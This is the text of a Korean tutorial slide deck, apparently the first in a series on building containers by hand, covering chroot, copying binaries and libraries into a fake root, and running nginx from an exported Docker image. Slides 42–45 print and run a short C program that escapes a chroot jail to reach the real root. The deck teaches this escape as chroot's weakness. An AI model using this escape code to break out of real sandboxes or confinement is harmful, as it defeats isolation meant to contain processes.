  • 13. chroot ? change root directory ‘ / ’ 원격 유저(FTP 등)를 특정 디렉토리 경로에 가두기 위한 용도 등으로 사용됨 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail Hacker 따라서.. 특정 디렉토리 경로를 root로 지정할 수 있으면 해당 경로에 프로세스를 가둘 수 있다는 점에 착안 ~
  • 14. chroot 실습 chroot로 컨테이너를 만들어 보자 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail
  • 15. chroot 실습 chroot는 새로운 경로(NEWROOT)와 실행할 커맨드를 인자로 받습니다. # man chroot ~ 커맨드를 따로 지정하지 않으면 default 커맨드 (/bin/sh) 로 동작합니다.
  • 16. # mkdir new-root # chroot new-root /bin/bash new-root 폴더를 만들고, chroot를 해봅시다 chroot 실습
  • 17. # chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 ~ chroot의 커맨드(/bin/bash)는 new-root 경로를 기준으로 합니다 즉, 실행할 커맨드가 경로에 없다고 에러 빽 ~
  • 18. chroot 실습 # which bash /bin/bash # mkdir -p new-root/bin # cp /bin/bash new-root/bin /bin/bash 파일을 new-root/bin 으로 복사해주세요
  • 19. # chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 왜 또 ~ ㅠ 다시 실행해 보지만 …
  • 20. # ldd /bin/bash ldd prints the shared libraries required 참고) man ldd (list dynamic dependencies) /bin/bash에서 실행 시 참조하는 라이브러리들이 있었군요 chroot 실습
  • 21. chroot 실습 bash 실행을 위한 라이브러리도 복사해주세요 한땀한땀 ~ # mkdir new-root/lib # cp /lib/x86_64-linux-gnu/libtinfo.so.5 new-root/lib/ # cp /lib/x86_64-linux-gnu/libdl.so.2 new-root/lib/ # cp /lib/x86_64-linux-gnu/libc.so.6 new-root/lib/ # mkdir new-root/lib64 # cp /lib64/ld-linux-x86-64.so.2 new-root/lib64/ Q) linux-vdso.so.1 은 왜 복사안해요 ? A) *-vdso 는 커널레벨에서제공되는 공유 라이브러리입니다. 참고) man vdso (virtual dynamic shared object)
  • 22. chroot 실습 # chroot new-root /bin/bash bash-4.4# 성공 ~ 오.. 뭔가 다른 터미널에 들어온 기분이네요
  • 23. chroot 실습 But … 세상일이라는게 호락호락 하지 않네요 ...
  • 24. chroot 실습 ls 명령어도 복사해 넣어봅시다 먼저, exit 를 입력하여 chroot로 실행된 프로세스를 종료합니다 bash-4.4# exit #
  • 25. chroot 실습 ls 명령어도 복사해 넣어봅시다 # cp /bin/ls new-root/bin # cp /lib/x86_64-linux-gnu/libselinux.so.1 . . . 이하 생략 . . . 직접 하실 수 있겠지요 ? 앞서 bash 복사와 동일합니다 :-) 한땀한땀 ~ cp 해주세요
  • 26. chroot 실습 다시 chroot 로 new-root의 bash를 실행해 보세요 # chroot new-root /bin/bash bash-4.4# 이번에는 ls 도 동작합니다
  • 27. chroot 실습 ls 로 확인해보니 “/” (root) 가 달라졌습니다 원래 root (“/”)
  • 28. bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail chroot 실습 그리고, root 밖으로 벗어날 수 없습니다 원래 root (“/”)
  • 29. chroot 실습 cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요 그렇습니다 . 사용하고 싶은 명령어는 한땀한땀 넣어주어야 합니다. bash와 라이브러리들을 복사해온 것 처럼 말이죠
  • 30. chroot 실습 new-root copy copy copy cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요
  • 31. chroot 실습 필요한 프로그램들은 이처럼 한땀한땀 복사해 넣어야 합니다. 저는 욕심을 좀 부려보았습니다. ps 를 해보기 위해 mount 까지 넣어보았습니다. new-root
  • 32. 그것이 바로 이미지(image) 입니다 :-) 흔히들, “도커 이미지”라고 부르는 그것 말이죠. 일종의 tarball 이라고 생각하면 됩니다. nginx image tarball 누군가 미리 필요한 것들을 모아 둔 것을 가져다 쓰면 편하겠죠 ? chroot + 이미지 실습
  • 33. 말 나온김에 이미지를 가져와 볼까요 ? nginx-root # cd /tmp # mkdir nginx-root 일단, /tmp 에 “nginx-root” 라는 새로운 폴더를 하나 만들어 줍시다. chroot + 이미지 실습
  • 34. 새로 만든 nginx-root 라는 경로에 nginx 이미지를 풀어줄 건데요 이 명령은 아래의 단계를 수행합니다. 1. 이미지 저장소로 부터 nginx:latest 이미지를 가지고 와서 2. tarball로 export (압축) 한 것을 3. nginx-root 경로에 풀어줍니다. 말 나온김에 이미지를 가져와 볼까요 ? nginx-root nginx image tarball # docker export $(docker create nginx:latest) | tar -C nginx-root -xvf - chroot + 이미지 실습
  • 35. 이처럼 필요한 이미지를 풀어놓은 경로를 chroot 를 해주면 ~ # chroot nginx-root /bin/sh # ls 명령도 동작을 하네요 ~ 누군가 필요한 것들을 잘 모아 놓았습니다. chroot + 이미지 실습
  • 36. nginx image tarball 의 내용과 동일합니다 … 압축을 풀어놓은 그대로죠 ㅎㅎ nginx image tarball = 동일 chroot + 이미지 실습
  • 37. nginx 도 한번 실행해 볼까요? chroot + 이미지 실습
  • 38. 터미널창을 하나 더 열어서 실제 접속이 되는지 확인해 보세요 # curl localhost 터미널 #2 접속이 잘 되었다면 성공 ~ chroot + 이미지 실습
  • 39. 지금까지 nginx 이미지와 chroot를 이용하여 nginx 웹서버를 실행해 보았습니다 nginx image tarball nginx-root “실제 컨테이너 처럼” 프로그램 실행에 필요한 파일들을 모아놓고 해당 경로를 root로 하여 프로세스를 실행하는 것을 재현해 보았는데요 chroot + 이미지 실습
  • 40. 그런데 말입니다 … chroot에는 치명적인 문제가 있습니다 new-root chroot chroot 문제점
  • 41. chroot 문제점 그것은 바로 ~~~ 탈옥이 가능하다는 점입니다 … bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Angry Hacker
  • 42. chroot 에서 탈출해보자 탈옥 코드 # vi escape_chroot.c #include <sys/stat.h> #include <unistd.h> int main(void) { mkdir(".out", 0755); chroot(".out"); chdir("../../../../../"); chroot("."); return execl("/bin/sh", "-i", NULL); }
  • 43. chroot 에서 탈출해보자 탈옥 코드를 컴파일하고 new-root에 복사합니다 # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root /bin/bash bash-4.4# ls / change root 는 잘됐군 ~
  • 44. chroot 에서 탈출해보자 escape_chroot 를 실행하면 ... # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root bash-4.4# ls / bash-4.4# ./escape_chroot # ls / bin escape_chroot lib usr / (Fake root) 탈옥
  • 45. 탈옥에 성공했다는 것은 … 실제 루트 (/)를 취득했다는 얘기가 되겠죠 ㅠ.ㅠ chroot 에서 탈출해보자 bin escape_chroot lib usr / (Fake root)
  • 46. chroot 문제점 탈옥 말고도 … chroot 가 가지고 있는 문제점은 많습니다. ~ 호스트와의 격리 문제, 리소스 제한, 보안 ... 앞으로 이러한 문제들 하나하나 해결해 가면서 함께 완전한 컨테이너를 만들어 보시죠 :-)
  • 47. 2편 예고 다음 편에서는 chroot 의 탈옥문제를 해결하는 방법으로써 pivot_root에 대해 다루도록 하겠습니다
  • 48. END